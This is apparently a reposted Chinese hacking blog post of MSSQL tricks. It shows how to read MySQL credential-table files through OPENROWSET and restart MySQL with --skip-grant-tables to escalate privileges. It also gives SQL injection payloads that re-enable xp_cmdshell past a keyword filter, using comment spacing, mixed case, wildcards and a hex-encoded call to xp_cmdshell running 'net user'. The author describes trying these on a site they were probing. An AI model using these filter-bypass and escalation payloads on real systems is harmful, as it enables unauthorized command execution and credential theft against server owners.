标签:
Title:MSSQL 小技巧 --2012-12-31 11:29
1.
某日一个MSSQL 2008降权,想用MYSQL 3306外联提权,无ROOT密码,遂读取MYSQL文件,导出。
MSSQL 读取二进制/EXE/dat等文件
参考 http://hi.baidu.com/_ccsec/item/be4f68481bf3c8ba61d7b90e
--drop table tbldata;
--Create table tblData(FileId int,FileData varbinary(max));
--Insert into tblData (FileId, FileData) SELECT 1, BulkColumn FROM OPENROWSET(BULK N‘C:\Program Files\MySQL\MySQL Server 5.5\data\mysql\user.frm‘, SINGLE_BLOB) AS Document;
--select * from tbldata
<1>
cd "C:\Program Files\MySQL\MySQL Server 5.5\bin"
mysqld.exe --skip-grant-tables
<2>
读取三文件,修改为其他表名,查询之...
2.
某日鼓捣某站,MSSQL 2005,SA权限,遂开启XP_CMDSHELL,但是XP_CMDSHELL作为关键字被拦截,测试可以简写开启,绕过...
//能够匹配成xp_cmdshell即可...
以下两种不同的方法:
<1>
ExECuTe/**/sp_configure/**/‘show%%advanced%%options‘,/**/1;RECONFIGURE;eXeCuTe/**/sp_configure/**/‘xp_cMd%‘,/**/1;RECONFIGURE;--
ExECuTe/**/sp_configure/**/‘show%%%%%%advanced%%%%%options‘,/**/1;RECONFIGURE;eXeCuTe/**/sp_configure/**/‘%%%%%%%%xp_cMd%%%%%%‘,/**/1;RECONFIGURE;--
ExECuTe/**/sp_configure/**/‘show%%advanced%%options‘,/**/1;RECONFIGURE;eXeCuTe/**/sp_configure/**/‘xp_cMd%el%‘,/**/1;RECONFIGURE;--
<2>//这个是常用的...
declare/**/@a/**/varchar(100)/**/set/**/@a=0x6d61737465722e64626f2e78705f636d647368656c6c declare @b varchar(20)set @b=0x6e65742075736572;eXEC/**/@a/**/@b
标签:
原文地址:http://www.cnblogs.com/TeaIng-Index/p/4320677.html